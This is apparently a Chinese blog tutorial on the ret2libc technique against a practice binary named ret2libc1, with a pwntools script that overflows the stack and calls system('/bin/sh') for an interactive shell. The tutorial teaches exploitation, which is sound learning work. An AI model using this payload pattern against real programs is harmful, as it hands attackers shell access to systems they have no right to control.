ret2libc

原理

执行libc中的/bin/sh

步骤

首先，检查程序的安全保护

开启NX：no executable 
（不可执行内存数据页）
（不能利用ret2text与ret2shellcode）
1
2
3

其次，查看有无/bin/sh

查看有无system （segment是plt，不是extern）

/bin/sh，是一个字符串，需要知道地址。

system， 是一个可调用函数，需要知道地址。

用 system 调用 /bin/sh即可

所以编写payload，寻址方式可以查看之前的博客，同为112。

#!/usr/bin/env python
from pwn import *

sh = process('./ret2libc1')

binsh_addr = 0x8048720
system_plt = 0x08048460
payload = flat(['a' * 112, system_plt, 'b' * 4, binsh_addr])
sh.sendline(payload)

sh.interactive()
1
2
3
4
5
6
7
8
9
10
11

调用libc函数的格式：

system_plt + 4个字节（32位地址） + /bin/sh字符串

这里我们需要注意函数调用栈的结构，如果是正常调用 system 函数，我们调用的时候会有一个对应的返回地址，这里以’bbbb’ 作为虚假的地址，其后参数对应的参数内容。

这个例子相对来说简单，同时提供了 system 地址与 /bin/sh 的地址，但是大多数程序并不会有这么好的情况。